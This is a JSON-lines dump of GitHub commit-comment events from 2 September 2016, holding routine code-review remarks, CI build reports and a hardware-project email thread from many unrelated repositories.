{"id":"4510058744","type":"CommitCommentEvent","actor":{"login":"jakdemir"},"repo":{"name":"ApolloPonos/workplace"},"payload":{"comment":{"id":18884796,"position":5,"line":5,"path":"Ornek/edu/java/hackerrank/IntroductionQuestion7.java","commit_id":"16905f75e5b3c61df162a534c1467615b6a5659c","created_at":"2016-09-02T18:35:21Z","updated_at":"2016-09-02T18:35:21Z","body":"Could you add question names as comments?"}},"created_at":"2016-09-02T18:35:21Z"}
{"id":"4510065149","type":"CommitCommentEvent","actor":{"login":"CyB3RC0nN0R"},"repo":{"name":"CyB3RC0nN0R/Hive"},"payload":{"comment":{"id":18884818,"position":null,"line":null,"path":null,"commit_id":"c782142618b1b5cf876fffb7ba54dceae96a2927","created_at":"2016-09-02T18:36:44Z","updated_at":"2016-09-02T18:36:44Z","body":"HUD is also completely movable now"}},"created_at":"2016-09-02T18:36:44Z"}
{"id":"4510066257","type":"CommitCommentEvent","actor":{"login":"mlopez721"},"repo":{"name":"mlopez721/recipes"},"payload":{"comment":{"id":18884821,"position":5,"line":10,"path":"cake-recipe.txt","commit_id":"170be246b59ae344719bf6f4fe2010a842c35371","created_at":"2016-09-02T18:37:00Z","updated_at":"2016-09-02T18:37:00Z","body":"This is a comment in the changed line."}},"created_at":"2016-09-02T18:37:00Z"}
{"id":"4510068197","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884832,"position":null,"line":null,"path":null,"commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:37:25Z","updated_at":"2016-09-02T18:37:25Z","body":"Since we use micro-classes, there's no need for a separate partial for adjusting the flag."}},"created_at":"2016-09-02T18:37:25Z"}
{"id":"4510068543","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18884834,"position":null,"line":null,"path":null,"commit_id":"4497ff909c700fcc506ef15e2ce7540e603aadfc","created_at":"2016-09-02T18:37:30Z","updated_at":"2016-09-02T18:37:30Z","body":"This commit is much easier to read in \"Split\" view"}},"created_at":"2016-09-02T18:37:30Z"}
{"id":"4510070795","type":"CommitCommentEvent","actor":{"login":"Workgood"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18884837,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T18:38:01Z","updated_at":"2016-09-02T18:38:01Z","body":"И в целом этот способ"}},"created_at":"2016-09-02T18:38:01Z"}
{"id":"4510074684","type":"CommitCommentEvent","actor":{"login":"thomas-mangin"},"repo":{"name":"brijohn/exabgp"},"payload":{"comment":{"id":18884845,"position":null,"line":null,"path":null,"commit_id":"4ca039e834577d7a7f285659a4f852177cfc1150","created_at":"2016-09-02T18:38:53Z","updated_at":"2016-09-02T18:38:53Z","body":"I do not run syslog .. if you can tell me how it changes the output for the best, happy to merge this change."}},"created_at":"2016-09-02T18:38:53Z"}
{"id":"4510076410","type":"CommitCommentEvent","actor":{"login":"ferkun"},"repo":{"name":"illuminate/database"},"payload":{"comment":{"id":18884847,"position":null,"line":null,"path":null,"commit_id":"d84374839a07998b2ac6cd8973ba3876639f9f26","created_at":"2016-09-02T18:39:14Z","updated_at":"2016-09-02T18:39:14Z","body":"This is great. Do you wil make the same for create? if not exist by egg.?"}},"created_at":"2016-09-02T18:39:14Z"}
{"id":"4510081141","type":"CommitCommentEvent","actor":{"login":"thomas-mangin"},"repo":{"name":"brijohn/exabgp"},"payload":{"comment":{"id":18884856,"position":null,"line":null,"path":null,"commit_id":"6fa135f659e6ecddfe59029f29f27930d0789e7a","created_at":"2016-09-02T18:40:15Z","updated_at":"2016-09-02T18:40:15Z","body":"Happy to merge if you send a PR"}},"created_at":"2016-09-02T18:40:15Z"}
{"id":"4510086076","type":"CommitCommentEvent","actor":{"login":"ApolloPonos"},"repo":{"name":"ApolloPonos/workplace"},"payload":{"comment":{"id":18884864,"position":1,"line":1,"path":"Ornek/edu/racket/intro/advancedControlAndAnimationCases.java","commit_id":"16905f75e5b3c61df162a534c1467615b6a5659c","created_at":"2016-09-02T18:41:17Z","updated_at":"2016-09-02T18:41:17Z","body":"Excellent! Thank you."}},"created_at":"2016-09-02T18:41:17Z"}
{"id":"4510091108","type":"CommitCommentEvent","actor":{"login":"nooradeen94"},"repo":{"name":"laracamp/tdd"},"payload":{"comment":{"id":18884877,"position":null,"line":null,"path":null,"commit_id":"1884df6e07520feb9bbce3f2117d4201ff8202ce","created_at":"2016-09-02T18:42:23Z","updated_at":"2016-09-02T18:42:23Z","body":"https://github.com/nooradeen94/LaravelBootCamp\r\n\r\nهادا الكود التاني بعد التعديلات "}},"created_at":"2016-09-02T18:42:23Z"}
{"id":"4510092766","type":"CommitCommentEvent","actor":{"login":"busster"},"repo":{"name":"busster/phase-0-tracks"},"payload":{"comment":{"id":18884883,"position":null,"line":null,"path":null,"commit_id":"e2ae5bc7ac2aab8cbe03ba83352a129a758c6f6d","created_at":"2016-09-02T18:42:44Z","updated_at":"2016-09-02T18:42:44Z","body":"@amrinder86"}},"created_at":"2016-09-02T18:42:44Z"}
{"id":"4510094710","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18884895,"position":null,"line":null,"path":null,"commit_id":"811ba74ff6b19cfc8101a201b86a29e1e564f064","created_at":"2016-09-02T18:43:09Z","updated_at":"2016-09-02T18:43:09Z","body":"113835831-Source-Temp-Not-Reporting (RKStrand) - i386-Windows-7-VisualStudio-12: OK (2332 of 2333 tests passed, 24 test warnings)\n\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 4 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T18:43:09Z"}
{"id":"4510095481","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884897,"position":23,"line":81,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:43:18Z","updated_at":"2016-09-02T18:43:18Z","body":"I've tried using custom heading classes, but they are very difficult to override using micro-classes. They rely on typography being defined first. We should render `h--headline`, etc, **obsolete** and instead use separate micro-classes for achieving exactly the same thing."}},"created_at":"2016-09-02T18:43:18Z"}
{"id":"4510102519","type":"CommitCommentEvent","actor":{"login":"kfalls99"},"repo":{"name":"epiil/open-cleaner"},"payload":{"comment":{"id":18884912,"position":3,"line":31,"path":"README.md","commit_id":"f7970ce9abde7a511c46aa00e74f8fe39191bfdb","created_at":"2016-09-02T18:44:45Z","updated_at":"2016-09-02T18:44:45Z","body":"Hi Erik,\n     Thanks for the previous information.  I think I'll try both the standoffs your reference and possibly nylon as well.  We now have all of our parts and are ready to start laying out the top panel.  I'm still not able to see measurements.  I'm not sure what is wrong.  Would it be possible for you to send visuals all of the cabinet panels with measurements, so I can start with laying out the top?  We've invested the cost for parts and our IU representative keeps \"pinging\" me for results.  I appreciate your time.\n\nKen\n\nKen Falls\nMaintenance Engineer\nMemnon Archiving Services Inc.\nInnovation Center\n2719 E. 10th Street\nBloomington, IN 47408\nPh: 812-856-6891\n________________________________\nFrom: Ken Falls\nSent: Thursday, August 18, 2016 13:55\nTo: epiil/open-cleaner; epiil/open-cleaner\nCc: Comment\nSubject: RE: [epiil/open-cleaner] yup (f7970ce)\n\nHi Eric,\n     I work for Memnon Archiving Services Inc.  We're currently working with Indiana University archiving their media collections.  We have RTI and Indelt cleaners, but IU wanted to build one of their own.  We've gathered 80% of the parts, then noticed the section explaining about 3D printed parts and the sleeves which we custom made.  It sidetracked us for a bit, so I'm trying to get more information.\n     I've down-loaded the utilities mentioned in the project, but have yet to find drawings with measurements.  I'm not sure what I'm missing.  I wanted to start on the top panel, but see only 3D/2D line drawings and no measurements.  When you have time, could you please tell me what I need to do to get measurements.  Right now I'm pretty lost.  I have degrees in Electronics and computer hardware, so should be able to understand any tech info you can provide.\n\nThanks for the quick response.  I look forward to hearing from you.  BTW.  Nice project.  We look forward to getting it running.\n\nKen\n\nKen Falls\nMaintenance Engineer\nMemnon Archiving Services Inc.\nInnovation Center\n2719 E. 10th Street\nBloomington, IN 47408\nPh: 812-856-6891\n________________________________\nFrom: Erik Piil [notifications@github.com]\nSent: Thursday, August 18, 2016 13:43\nTo: epiil/open-cleaner\nCc: Ken Falls; Comment\nSubject: Re: [epiil/open-cleaner] yup (f7970ce)\n\nHi,\n\nErik here. If i'm understanding you correctly, in the past I've used these\nstandoffs with some success:\n\nhttp://www.mcmaster.com/#catalog/122/3289/=13s4h6w\n\nI'm testing the stainless steel versions which are non-magnetic (although\nconductive). It's a possibility to move to aluminum or nylon if static\nbecomes an issue.\n\nI'm open to any comments on this topic.\n\nBest,\n\nErik\n\n\n\nOn Thu, Aug 18, 2016 at 1:36 PM, kfalls99 <notifications@github.com> wrote:\n\n> I have questions about the cleaner. Specifically the anti-static stainless\n> steel guide sleeves. Who should I contact?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/epiil/open-cleaner/commit/f7970ce9abde7a511c46aa00e74f8fe39191bfdb#commitcomment-18693117>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACczEjQjQ1o48xgFKiNIrkDj0e6BGN7Fks5qhJgCgaJpZM4Jnu31>\n> .\n>\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub<https://github.com/epiil/open-cleaner/commit/f7970ce9abde7a511c46aa00e74f8fe39191bfdb#commitcomment-18693237>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ARvB7KQ4saaXG6jNjy7QloX1njEP6VVGks5qhJnCgaJpZM4Jnu31>.\n"}},"created_at":"2016-09-02T18:44:45Z"}
{"id":"4510103358","type":"CommitCommentEvent","actor":{"login":"vipuljha08"},"repo":{"name":"dev-harsh1998/misc"},"payload":{"comment":{"id":18884918,"position":null,"line":null,"path":null,"commit_id":"70703670bc93fb9d32a9ed637eab993d8e0db3e6","created_at":"2016-09-02T18:44:55Z","updated_at":"2016-09-02T18:44:55Z","body":"Lmao 😂😂😂😂😂😂"}},"created_at":"2016-09-02T18:44:55Z"}
{"id":"4510104236","type":"CommitCommentEvent","actor":{"login":"ApolloPonos"},"repo":{"name":"ApolloPonos/workplace"},"payload":{"comment":{"id":18884920,"position":5,"line":5,"path":"Ornek/edu/java/hackerrank/IntroductionQuestion7.java","commit_id":"16905f75e5b3c61df162a534c1467615b6a5659c","created_at":"2016-09-02T18:45:06Z","updated_at":"2016-09-02T18:45:06Z","body":"Of course why not."}},"created_at":"2016-09-02T18:45:06Z"}
{"id":"4510108322","type":"CommitCommentEvent","actor":{"login":"sdaftuar"},"repo":{"name":"theuni/bitcoin"},"payload":{"comment":{"id":18884933,"position":6,"line":130,"path":"qa/rpc-tests/test_framework/util.py","commit_id":"fa88a425c0c1089ab75ea9223699286f40c8eea7","created_at":"2016-09-02T18:45:57Z","updated_at":"2016-09-02T18:45:57Z","body":"If node0's best block is behind everyone else's, won't this wait for N seconds on each loop iteration, where N is the number of nodes?  So in particular this function could take longer than the timeout passed in.\r\n\r\nPerhaps it would make more sense to add a new function, sync_wallet(), which ensures that each nodes wallet is synced with its tip?  That would require more changes to the existing rpc tests though to use it.\r\n\r\nI guess if we did that, we could call sync_wallet() on each node at the end of this function as well."}},"created_at":"2016-09-02T18:45:57Z"}
{"id":"4510109534","type":"CommitCommentEvent","actor":{"login":"Sycholic"},"repo":{"name":"Sycholic/PermissionsEx-1.23.x-Maintained"},"payload":{"comment":{"id":18884938,"position":null,"line":null,"path":null,"commit_id":"11f40294ecfe4c0f0f0bd155d9a85c8283ede6ea","created_at":"2016-09-02T18:46:13Z","updated_at":"2016-09-02T18:46:13Z","body":"okay dang was hoping that might been the reason."}},"created_at":"2016-09-02T18:46:13Z"}
{"id":"4510110480","type":"CommitCommentEvent","actor":{"login":"dryganets"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18884941,"position":null,"line":null,"path":null,"commit_id":"ccdc57dd966d80b09fafb93b05abce925b71e949","created_at":"2016-09-02T18:46:24Z","updated_at":"2016-09-02T18:46:24Z","body":"There is another approach to fix the same issue:\r\nthere is a Strict mode in JSC for strings\r\nand it's turned on by default\r\n\r\nif you would turn it off it would work as well"}},"created_at":"2016-09-02T18:46:24Z"}
{"id":"4510110972","type":"CommitCommentEvent","actor":{"login":"JuanC94"},"repo":{"name":"bayuelo/camaleon"},"payload":{"comment":{"id":18884942,"position":null,"line":null,"path":null,"commit_id":"a9f7327376cb554228b6ce0f7f770f2f7d8d1998","created_at":"2016-09-02T18:46:31Z","updated_at":"2016-09-02T18:46:31Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;6aVwQc72&#x2F;16-modulo-materia-prima-codificacion\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Módulo Materia Prima - Codificación</a>"}},"created_at":"2016-09-02T18:46:31Z"}
{"id":"4510118817","type":"CommitCommentEvent","actor":{"login":"jonschlinkert"},"repo":{"name":"generate/generate-package"},"payload":{"comment":{"id":18884961,"position":12,"line":12,"path":"templates/min.json","commit_id":"33c9d8a27eb8861f12aff15fc0237365d920e16a","created_at":"2016-09-02T18:48:14Z","updated_at":"2016-09-02T18:48:14Z","body":"only if `repository` is the correct format. Remember this has to work for everyone. That's why it's a pita"}},"created_at":"2016-09-02T18:48:14Z"}
{"id":"4510121814","type":"CommitCommentEvent","actor":{"login":"sjakkidi"},"repo":{"name":"sjakkidi/git-tut"},"payload":{"comment":{"id":18884966,"position":null,"line":null,"path":null,"commit_id":"f209b4a2f54c708174bfce38ccc8341a8f40692a","created_at":"2016-09-02T18:48:53Z","updated_at":"2016-09-02T18:48:53Z","body":"Initial code"}},"created_at":"2016-09-02T18:48:53Z"}
{"id":"4510123344","type":"CommitCommentEvent","actor":{"login":"ApolloPonos"},"repo":{"name":"ApolloPonos/workplace"},"payload":{"comment":{"id":18884971,"position":14,"line":14,"path":"Ornek/edu/java/hackerrank/IntroductionQuestion8.java","commit_id":"16905f75e5b3c61df162a534c1467615b6a5659c","created_at":"2016-09-02T18:49:12Z","updated_at":"2016-09-02T18:49:12Z","body":"This question; https://www.hackerrank.com/challenges/java-output-formatting"}},"created_at":"2016-09-02T18:49:12Z"}
{"id":"4510124054","type":"CommitCommentEvent","actor":{"login":"sjakkidi"},"repo":{"name":"sjakkidi/git-tut"},"payload":{"comment":{"id":18884976,"position":null,"line":null,"path":null,"commit_id":"f209b4a2f54c708174bfce38ccc8341a8f40692a","created_at":"2016-09-02T18:49:21Z","updated_at":"2016-09-02T18:49:21Z","body":"Initial code 2"}},"created_at":"2016-09-02T18:49:21Z"}
{"id":"4510134371","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18885002,"position":null,"line":null,"path":null,"commit_id":"5062c912c51178a2712fb6004ce273506b1b7739","created_at":"2016-09-02T18:51:39Z","updated_at":"2016-09-02T18:51:39Z","body":"++"}},"created_at":"2016-09-02T18:51:39Z"}
{"id":"4510137098","type":"CommitCommentEvent","actor":{"login":"alinz"},"repo":{"name":"Hermanya/listenable-browser"},"payload":{"comment":{"id":18885010,"position":8,"line":35,"path":"support_for_this_browser.js","commit_id":"c343679059b3123d91c0b6f266bb4dfe96385976","created_at":"2016-09-02T18:52:16Z","updated_at":"2016-09-02T18:52:16Z","body":"I wouldn't do it like this. 2 main reasons. 1. loading dynamically a module makes your code unstable, because you don't know what location.hostname will be. 2. require internally uses some struct to maintain the global state. also it meant to be crash if the file does not found. since you wrapped it in try catch, you will leak memory."}},"created_at":"2016-09-02T18:52:16Z"}
{"id":"4510137874","type":"CommitCommentEvent","actor":{"login":"chrisnojima"},"repo":{"name":"keybase/client"},"payload":{"comment":{"id":18885013,"position":null,"line":null,"path":null,"commit_id":"3eaa42b7cac1745f3eb7186d09000529f3a4f210","created_at":"2016-09-02T18:52:26Z","updated_at":"2016-09-02T18:52:26Z","body":"I don't think this'll work. The existing reset only does stuff on mobile so you'll have to plumb that through the framed message pack. That might not exist (we were talking to max k about this during planning) yet"}},"created_at":"2016-09-02T18:52:26Z"}
{"id":"4510138395","type":"CommitCommentEvent","actor":{"login":"crunchyNYC"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18885014,"position":null,"line":null,"path":null,"commit_id":"9d858276c1ef029fbc96dcbb401a0f10755016d4","created_at":"2016-09-02T18:52:34Z","updated_at":"2016-09-02T18:52:34Z","body":"Excellent!"}},"created_at":"2016-09-02T18:52:34Z"}
{"id":"4510140540","type":"CommitCommentEvent","actor":{"login":"chrisnojima"},"repo":{"name":"keybase/client"},"payload":{"comment":{"id":18885017,"position":null,"line":null,"path":null,"commit_id":"3eaa42b7cac1745f3eb7186d09000529f3a4f210","created_at":"2016-09-02T18:53:06Z","updated_at":"2016-09-02T18:53:06Z","body":"To test you could replace one of the bootstrap calls (like get extended config ) with a throw"}},"created_at":"2016-09-02T18:53:06Z"}
{"id":"4510144701","type":"CommitCommentEvent","actor":{"login":"kitsunet"},"repo":{"name":"kitsunet/Flowpack.ElasticSearch.ContentRepositoryAdaptor"},"payload":{"comment":{"id":18885029,"position":27,"line":272,"path":"Classes/Flowpack/ElasticSearch/ContentRepositoryAdaptor/Indexer/NodeIndexer.php","commit_id":"9fcab09af585e4335d3884f4a82843511cb93811","created_at":"2016-09-02T18:54:02Z","updated_at":"2016-09-02T18:54:02Z","body":"My bad, needs to be there, will update..."}},"created_at":"2016-09-02T18:54:02Z"}
{"id":"4510144718","type":"CommitCommentEvent","actor":{"login":"mayank-phadke"},"repo":{"name":"dietms/dietms.github.io"},"payload":{"comment":{"id":18885030,"position":null,"line":null,"path":null,"commit_id":"d1cca57c205c48999097e4b871dba5908a0dcc64","created_at":"2016-09-02T18:54:02Z","updated_at":"2016-09-02T18:54:02Z","body":"Something solved the header problem"}},"created_at":"2016-09-02T18:54:02Z"}
{"id":"4510144782","type":"CommitCommentEvent","actor":{"login":"ApolloPonos"},"repo":{"name":"ApolloPonos/workplace"},"payload":{"comment":{"id":18885032,"position":1,"line":1,"path":"Ornek/edu/racket/intro/recursion2.java","commit_id":"16905f75e5b3c61df162a534c1467615b6a5659c","created_at":"2016-09-02T18:54:03Z","updated_at":"2016-09-02T18:54:03Z","body":"This Racket programming language.\r\nAnd this function will calculate the factorial ."}},"created_at":"2016-09-02T18:54:03Z"}
{"id":"4510148561","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":18885042,"position":9,"line":131,"path":"spring-boot-tools/spring-boot-maven-plugin/src/main/java/org/springframework/boot/maven/RunMojo.java","commit_id":"951f051df95933d57776eb6ac23372665cb1965c","created_at":"2016-09-02T18:54:47Z","updated_at":"2016-09-02T18:54:47Z","body":";-)"}},"created_at":"2016-09-02T18:54:47Z"}
{"id":"4510150965","type":"CommitCommentEvent","actor":{"login":"roblav96"},"repo":{"name":"NativeScript/docs"},"payload":{"comment":{"id":18885045,"position":null,"line":null,"path":null,"commit_id":"8c56ef08241e49a6fc62a8ec619399411529141e","created_at":"2016-09-02T18:55:20Z","updated_at":"2016-09-02T18:55:20Z","body":"yes good call! I was gonna do this tomorrow haha Thanks!"}},"created_at":"2016-09-02T18:55:20Z"}
{"id":"4510155558","type":"CommitCommentEvent","actor":{"login":"lucasfcosta"},"repo":{"name":"lucasfcosta/karma-chai-http"},"payload":{"comment":{"id":18885051,"position":null,"line":null,"path":null,"commit_id":"cc1ce692bab9bb164023c854c79182e216d849ab","created_at":"2016-09-02T18:56:22Z","updated_at":"2016-09-02T18:56:22Z","body":"Awesome job!\nThanks buddy!"}},"created_at":"2016-09-02T18:56:22Z"}
{"id":"4510162370","type":"CommitCommentEvent","actor":{"login":"ruchern"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18885064,"position":4,"line":7,"path":"cfg.js.example","commit_id":"75557ea2a44ed9847cc9b54de4cf8843e4b6a3ea","created_at":"2016-09-02T18:57:48Z","updated_at":"2016-09-02T18:57:48Z","body":"Hmmm, what is this exactly for?"}},"created_at":"2016-09-02T18:57:48Z"}
{"id":"4510164462","type":"CommitCommentEvent","actor":{"login":"thomasdelhomenie"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18885067,"position":5,"line":418,"path":"application/src/main/webapp/js/notif.js","commit_id":"687949b1600f18aeff4b41986014570d2890b832","created_at":"2016-09-02T18:58:16Z","updated_at":"2016-09-02T18:58:16Z","body":"Yes :smile: \r\nThere are 2 spaces and 1 tab."}},"created_at":"2016-09-02T18:58:16Z"}
{"id":"4510166666","type":"CommitCommentEvent","actor":{"login":"bookling"},"repo":{"name":"bookling/spark"},"payload":{"comment":{"id":18885069,"position":null,"line":null,"path":null,"commit_id":"60e6f0ee2a3cdfb2b526a6d12887513f3aabed42","created_at":"2016-09-02T18:58:39Z","updated_at":"2016-09-02T18:58:39Z","body":"\r\nIn the labelPropagation of graphx lib, node is initialized with a unique\r\nlabel and at every step each node adopts the label that most of its neighbors currently have, but ignore the label it currently have. I think it is unreasonable, because the labe a node had is also useful. When a node trend to has a stable label, this means there is an association between two iterations, so a node not only affected by its neighbors, but also its current label.\r\nso I change the code, and use both the label of its neighbors and itself.\r\n\r\nThis iterative process densely connected groups of nodes form a consensus on a unique label to form\r\ncommunities. But the communities of the LabelPropagation often discontinuous.\r\nBecause when the label that most of its neighbors currents have are many,e.g, node \"0\" has 6 neigbors labed {\"1\",\"1\",\"2\",\"2\",\"3\",\"3\"},it maybe randomly select a label. in order to get a stable label of communities, and prevent the randomness, so I chose the max lable of node.\r\n\r\n"}},"created_at":"2016-09-02T18:58:39Z"}
{"id":"4510174095","type":"CommitCommentEvent","actor":{"login":"kirbyfan64"},"repo":{"name":"felix-lang/felix"},"payload":{"comment":{"id":18885082,"position":6,"line":632,"path":"src/packages/numbers.fdoc","commit_id":"f32a9f44c346581b434e8182573884f5478c3063","created_at":"2016-09-02T19:00:15Z","updated_at":"2016-09-02T19:00:15Z","body":"Well, this is what happens when you use a crappy compiler... ;)"}},"created_at":"2016-09-02T19:00:15Z"}
{"id":"4510175623","type":"CommitCommentEvent","actor":{"login":"mmun"},"repo":{"name":"bterlson/ecmarkup"},"payload":{"comment":{"id":18885087,"position":33,"line":53,"path":"package.json","commit_id":"f47d6587f3768d253abbdad88a990d86244a4952","created_at":"2016-09-02T19:00:32Z","updated_at":"2016-09-02T19:00:32Z","body":"Thank you kindly!"}},"created_at":"2016-09-02T19:00:32Z"}
{"id":"4510177573","type":"CommitCommentEvent","actor":{"login":"bionary"},"repo":{"name":"DataShades/ckanext-saml2"},"payload":{"comment":{"id":18885092,"position":null,"line":null,"path":null,"commit_id":"b4194f066baae67f87c1d1a1bc84db9fc48c8b5d","created_at":"2016-09-02T19:00:58Z","updated_at":"2016-09-02T19:00:58Z","body":"This edit forces the plugin to rely completely on the REMOTE_USER header info returned from the IdP to correctly contain the same id as that mapped in the saml response. This wasn't the case for my connection with a current Shibboleth IdP. After reinserting the removed line and amending it to reference the correct attribute (saml_info[\"uid][0] in my case) all is well."}},"created_at":"2016-09-02T19:00:58Z"}
{"id":"4510179108","type":"CommitCommentEvent","actor":{"login":"GenjitsuGame"},"repo":{"name":"GenjitsuGame/cspspc"},"payload":{"comment":{"id":18885096,"position":3,"line":39,"path":"scripts/globals.lua","commit_id":"d34918f2b5fe147afddddd1277636b3b51de152f","created_at":"2016-09-02T19:01:19Z","updated_at":"2016-09-02T19:01:19Z","body":"Agreed, I only meant to explain that `GRENADE` should be 2 and `PISTOL` should be 3 so you know why I changed it in my following commits"}},"created_at":"2016-09-02T19:01:19Z"}
{"id":"4510183707","type":"CommitCommentEvent","actor":{"login":"julius-t"},"repo":{"name":"julius-t/julius-t.github.io"},"payload":{"comment":{"id":18885104,"position":null,"line":null,"path":null,"commit_id":"ed282118a8d2aa3a1043c611adffd3cc35278930","created_at":"2016-09-02T19:02:19Z","updated_at":"2016-09-02T19:02:19Z","body":"main"}},"created_at":"2016-09-02T19:02:19Z"}
{"id":"4510186177","type":"CommitCommentEvent","actor":{"login":"bwmarkle"},"repo":{"name":"BoldGrid/boldgrid-inspirations"},"payload":{"comment":{"id":18885117,"position":117,"line":109,"path":"includes/class-boldgrid-inspirations-receipts.php","commit_id":"16f0c7388b55b0843cb1f498bcf7fa6f9d7743c2","created_at":"2016-09-02T19:02:51Z","updated_at":"2016-09-02T19:02:51Z","body":"As verbally discussed, created wrapper function for this."}},"created_at":"2016-09-02T19:02:51Z"}
{"id":"4510187115","type":"CommitCommentEvent","actor":{"login":"TimelikeClosure"},"repo":{"name":"TimelikeClosure/cssBreakout"},"payload":{"comment":{"id":18885123,"position":null,"line":null,"path":null,"commit_id":"5050758195b38c3f5e6dcb7f089a96b11d2b8955","created_at":"2016-09-02T19:03:04Z","updated_at":"2016-09-02T19:03:04Z","body":"#5 "}},"created_at":"2016-09-02T19:03:04Z"}
{"id":"4510187239","type":"CommitCommentEvent","actor":{"login":"universam1"},"repo":{"name":"mikeller/Arduino"},"payload":{"comment":{"id":18885124,"position":null,"line":null,"path":null,"commit_id":"69b5d8937dc08fcf481cf3172ffe947d329bca7d","created_at":"2016-09-02T19:03:06Z","updated_at":"2016-09-02T19:03:06Z","body":"@mikeller Unfortunately this does not work, I've tried different settings."}},"created_at":"2016-09-02T19:03:06Z"}
{"id":"4510188667","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18885129,"position":null,"line":null,"path":null,"commit_id":"811ba74ff6b19cfc8101a201b86a29e1e564f064","created_at":"2016-09-02T19:03:24Z","updated_at":"2016-09-02T19:03:24Z","body":"113835831-Source-Temp-Not-Reporting (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1187 of 1187 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-02T19:03:24Z"}
{"id":"4510200383","type":"CommitCommentEvent","actor":{"login":"phpk80"},"repo":{"name":"xiaoluoboding/vue-demo-collection"},"payload":{"comment":{"id":18885159,"position":26,"line":22,"path":"shopping-cart/app/components/Index.vue","commit_id":"32700ba047567022f366f705d16f3bd23f43286f","created_at":"2016-09-02T19:06:02Z","updated_at":"2016-09-02T19:06:02Z","body":"住的地方"}},"created_at":"2016-09-02T19:06:02Z"}
{"id":"4510201460","type":"CommitCommentEvent","actor":{"login":"phpk80"},"repo":{"name":"xiaoluoboding/vue-demo-collection"},"payload":{"comment":{"id":18885161,"position":31,"line":27,"path":"shopping-cart/app/components/Index.vue","commit_id":"32700ba047567022f366f705d16f3bd23f43286f","created_at":"2016-09-02T19:06:17Z","updated_at":"2016-09-02T19:06:17Z","body":"@xiaoluoboding "}},"created_at":"2016-09-02T19:06:17Z"}
{"id":"4510202134","type":"CommitCommentEvent","actor":{"login":"colby-ham"},"repo":{"name":"IntelRealSense/librealsense"},"payload":{"comment":{"id":18885167,"position":null,"line":null,"path":null,"commit_id":"489de68920acc1f1f1d00a8dba7319f657892f6c","created_at":"2016-09-02T19:06:27Z","updated_at":"2016-09-02T19:06:27Z","body":"THANK YOU"}},"created_at":"2016-09-02T19:06:27Z"}
{"id":"4510203518","type":"CommitCommentEvent","actor":{"login":"schmidtk"},"repo":{"name":"openlayers/ol3"},"payload":{"comment":{"id":18885169,"position":4,"line":4,"path":"src/ol/image.js","commit_id":"bed95e3b5b3fbefaf4cb2e8b2bd9ffaad95f261f","created_at":"2016-09-02T19:06:45Z","updated_at":"2016-09-02T19:06:45Z","body":"This made `ol.Image` self-referencing, resulting in a circular dependency error when building a Closure dependency tree. Can this line be removed please?"}},"created_at":"2016-09-02T19:06:45Z"}
